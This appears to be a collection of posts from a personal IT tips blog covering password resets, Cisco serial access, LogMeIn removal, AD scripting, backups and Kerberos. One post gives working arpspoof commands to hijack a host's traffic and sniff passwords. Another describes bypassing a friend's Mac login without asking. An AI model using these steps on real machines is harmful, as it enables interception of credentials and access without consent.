Oct 11







So, you’ve forgotten your root or admin password to your Ubuntu pc and you need to reset the password.  If that is the case, then just follow the steps below and you will be reseting your password in just a matter of minutes:

1.) When you turn on your Ubuntu pc, and it starts to boot, press ESC to access the GRUB boot menu.
2.) Once the GRUB boot menu is showing, Highlight the first option and press E to edit the selection.  The selection should look something like this:  Ubunut 9.04, kernel 2.6.28-18-generic.  It will depend on what version of Ubuntu you are using…
3.) Scroll down and highlight the line that looks like this:  kernel /boot/vmlinuz-2.6….. and press E to edit.
4.) Change ro quiet splash to rw init=/bin/bash.  Then press ENTER.
5.) Now you should be able to press B to boot up your system into a root shell prompt.
7.) Once you have booted to your root shell prompt, just type passwd root or passwd admin or whatever username you need to change the password for.
8.) You will then want to type the following commands:

sync
reboot -f

That’s it, your password is now reset.

Oct 20







Connecting to a Cisco Router or Switch with a Mac or a Macbook Pro is not quite as straight forward as it is on a Windows PC. Mac’s don’t have serial ports and sometimes finding a USB to Serial adapter with Mac Drivers can prove difficult. This tutorial will show you how to connect just about any USB to Serial adapter to a Mac using a very generic driver and then how to start a session to your Cisco device by just using the Terminal app.

This tutorial assumes that you already have some kind of USB to serial adapter.

1.) Download the Prolific Technology Driver for USB to Serial adapters for Mac: md_PL2303_MacOSX10.6_dmg_v1.4.0.zip
2.) Install the Prolific Technology Driver and then Reboot your Mac.
3.) Plug the USB to Serial Adapter into any USB port on your Mac.
4.) Open “System Profiler” located in /Applications/Utilities.
5.) In “System Profiler“, under USB-Serial Controller, you should see your device. Click on it.
6.) You should now see Product ID and Version ID. These id’s will be listed in Hex and you will have to convert it to decimal using a calculator or an online converter.
7.) Open up the following file by typing this command into Terminal: sudo vi /System/Library/Extensions/ProlificUsbSerial.kext/Contents/Info.plist
8.) You should see something similar to the following:

idProduct
8963
idVendor
1659


9.) Make sure that the converted decimal value of your Product ID and Version ID in System Profiler match the values in Info.plist.
10.) Save your changes by type ESC :wq!.
11.) Unplug your USB to Serial Adapter.
12.) Type the following command into the Terminal App: sudo kextload /System/Library/Extensions/ProlificUsbSerial.kext
13.) Plug the USB to Serial Adapter into any USB port on your Mac.
14.) Open up “System Preferences” and go into the “Network” options and verify that your Mac lists your new USB to Serial Controller.
15.) Type the following command into the Terminal App to verify that your device is indeed installed on your system: ls /dev/tty.usbserial
16.) You should now be able to type the following command into the Terminal App to start a connection to your Cisco Device: screen /dev/tty.usbserial 9600

You should now see something like this on your terminal screen after you press return a few times:

Switch>

Oct 18







So you have either forgotten your Mac User’s password or you need to change an existing user’s password without knowing the original password. You have come to the right place. In my case, I was working on a friends Macbook for them and they left it with me to work on and they forgot to give me the password so that I could login and fix the issues. I could have waited until I could reach them to get the password but then I started thinking….If I ask them for the password, then they are going to think I don’t know what I’m doing, especially if I have to ask/beg them for the password…..Or I could just reset it and let them wonder with amazement at how I gained access to their system so quickly.

This tutorial assumes that the Mac User in question probably didn’t password protect their firmware (Which is the default out-of-the-box option).

1.) Power on the Mac in question.
2.) Immediately after you power on the Mac, before you hear the initial mac boot sound, Press and hold the “Command” + “s” keys until the Mac boots into a command prompt.
3.) Once you get a root prompt type the following commands:
mount -uw /
passwd username
4.) You will now be asked to enter in a new password for your user. Enter your new password.
5.) Now just type “reboot” and press return.
6.) You should now be able to login with the password that you just typed in.

Tagged with:
Apr 03









Well, Logmein may be a free appliation, but when you are tired of using it and you want to uninstall it, then you’ve got a problem.  When you go to add/remove programs in windows to uninstall logmein, it does something but it doesn’t completely uninstall the logmein product.  In order to uninstall it and get it off of your computer you need to perform the following steps:

1.)  Go to add/remove programs in windows and remove Logmein.

2.)  Edit the registry by typing “Windows Button” -> Run -> regedit

3.)  Delete the following Items out of your registry:

HKEY_CURRENT_USER -> Software -> LogMeIn

HKEY_LOCAL_MACHINE -> Software -> Microsoft -> Cryptography -> Services -> LogMeIn

HKEY_LOCAL_MACHINE -> System -> CurrentControlSet -> Control -> NetworkProvider -> HwOrder -> ProviderOrder and remove the LMIRfsClientNP from the list.

HKEY_LOCAL_MACHINE -> System -> CurrentControlSet -> Control -> NetworkProvider -> Order -> ProviderOrder and remove the LMIRfsClientNP from the list.

4.) Go to search and find a file called:  LMIRfsClientNP.dll & LMIRfsClientNP.sys.  If either of these files exist then rename them and reboot.

5.) Go to c:\program files\ and delete the folder LogMeIn.

6.) After all of these steps, reboot one more time just to be sure.

Nov 05









Here is a script that creates 13000 users in one ou called Management:

users.vbs:

Set objRootDSE = GetObject(“LDAP://rootDSE”)

Set objContainer = GetObject(“LDAP://OU=Management,” & _

objRootDSE.Get(“defaultNamingContext”))

For i = 1 To 13000

Set objLeaf = objContainer.Create(“User”, “cn=UserNo_” & i)

objLeaf.Put “sAMAccountName”, “UserNo_” & i

objLeaf.SetInfo

Next

Here is a script that creates 13000 Groups in one ou called Management:

groups.vbs:

For i =  1 To 13000

Set objOU = GetObject(“LDAP://OU=Management,dc=qa,dc=example,dc=net”)

Set objGroup = objOU.Create(“Group”, “cn=UserGroup_” & i)

objGroup.Put “sAMAccountName”, “UserGroup_” & i

objGroup.SetInfo

Next

Here is a script that creates 13000 Users and Groups in one ou called Management:

users_groups.vbs:

For i =  1 To 13000

Set objOU = GetObject(“LDAP://OU=Management,dc=qa,dc=example,dc=net”)

Set objUser = objOU.Create(“User”, “cn= UserNo” & i)

objUser.Put “sAMAccountName”, “UserNo” & i

objUser.SetInfo

Set objOU = GetObject(“LDAP://OU=Management,dc=qa,dc=example,dc=net”)

Set objGroup = objOU.Create(“Group”, “cn=UserGroup” & i)

objGroup.Put “sAMAccountName”, “UserGroup” & i

objGroup.SetInfo

objGroup.Add objUser.ADSPath

Next

Oct 08









example:  router=10.10.20.1  box to hijack=10.10.20.121

Step 1:  echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2:  arpspoof -i eth0 -t 10.10.20.121 10.10.20.1 & >/dev/null

Step 3:  arpspoof -i eth0 -t 10.10.20.1 10.10.20.121 & >/dev/null

Now you have hijacked all network traffic in and out from 10.10.20.121 and then you are redirecting it to the router 10.10.20.1.

You can now use tools like dsniff and others to sniff all of the traffic for passwords and etc….  If you are using ubuntu the only tools required are arpspoof.  You can install it using the following command:

sudo apt-get install dsniff ### This will install arpspoof for you on any version of ubuntu.

Aug 25









If you are using the latest version of the terrible, slow, web-based remote support application LogMeIn free for mac then all you need to do to remove it is go to “Applications” -> LogMeIn -> and double click on the LogMeInUninstaller.  When the Uninstaller comes up, just click on “Yes” to uninstall it.

If you are using an older version of LogMeIn then you will need to go to the following directory:

/Library/Application Support/LogMeIn/

run uninstaller.command

This will open up a terminal and prompt you for your Mac username and password and then uninstall LogMeIn from your system.

Either way, you need to reboot your system after both methods.

Jul 30








So, you’ve just installed Ubuntu and you need to start backing it up.  You’ve come to the right place.  All you need to do to start backing up your Ubuntu box is right here.

Step 1.)  Installing “Back In Time”.

sudo gedit /etc/apt/sources.list

Add the following line to this file:

deb http://le-web.org/repository stable main

wget http://le-web.org/repository/le-web.key

sudo apt-key add le-web.key

sudo apt-get update

sudo apt-get install backintime-common backintime-gnome

Step 2.)  Using “Back In Time”.

Go to Applications -> System Tools -> Back in Time.

Go through the different tabs and setup your settings for your backups.

Once you have everything setup then you need to hit the “Backup Now” button.  That’s it.  you now have your Ubuntu backups.

Jul 23









If you are setting up a kerberos user in active directory then you will need to do the following on one of the kerberos domain controllers:

Setspn -A HTTP/site kerbuser

for example if I had a website called support.acme.com and an active directory user called john.smith:

setspn -A HTTP/support.acme.com john.smith

Then after that I would run the following command:

ktpass -princ HTTP/site@KERBEROS_DOMAIN(ALL CAPS) -pass password -mapuser user@enviornment -out c:\temp\user.HTTP.keytab

for example:

ktpass -princ HTTP/support.acme.com@ACME.COM -pass password -mapuser john.smith@acme.com -out c:\temp\john.smith.HTTP.keytab

Once everything is setup, in order to login to the website using kerberos credentials through firefox or internet explorer you would need to do the following:

for Internet Explorer:

1.)  Join your computer to your kerberos Domain.

2.)  login to your pc using a kerberos domain user.

3.)  Setup the following for IE:

a.)  go to Tools -> Internet Options -> Click on the “Security” tab.

b.) Click on “Local Intranet” and then “Sites”

c.) Then Click on “Advanced”, Enter your site address here and click “Add”, then “Close”

4.)  Now you should be able to authenticate to your site using kerberos.

for Firefox:

1.) Join your computer to your kerberos domain which is usually your active directory domain.

2.) Login to your pc using a kerberos domain user which is usually your act ive directory users.

3.) In Firefox go to the address bar and enter “about:config” without the quotes.

4.) Filter for the following:  network.negotiate-auth.trusted-uris and set the value to your website for example:  http://support.acme.com,http://support.company.com

5.) Then set the following:  network.negotiate-auth.using-native-gsslib to true.

5.) Then leave the page and go to your website and you should be able to login.

Jul 16









f you connect your Mac OS X to the internet, then yes you need a Mac OS X Compatible Antivirus software program.  The only safe computer or Mac is one that never connects to any network and is always physically secure.  So, now that you know you need antivirus software, the question is what is out there for mac users as far as antivirus software goes?  I recommend PC Tools Antivirus software.  It seems to be a pretty good antivirus program and it’s also free for home users.  Corporate users have to pay a nominal fee.  You can download PC Tools Antivirus software for Mac OS X from the following link:  http://www.iantivirus.com/download/

Once you install the software, which is a very easy install, it will startup automatically and you can go ahead and make sure that “Protect My Mac” is checked and then you can go ahead and scan your mac to make sure that you don’t have anything on your computer that is malicious.

preload preload preload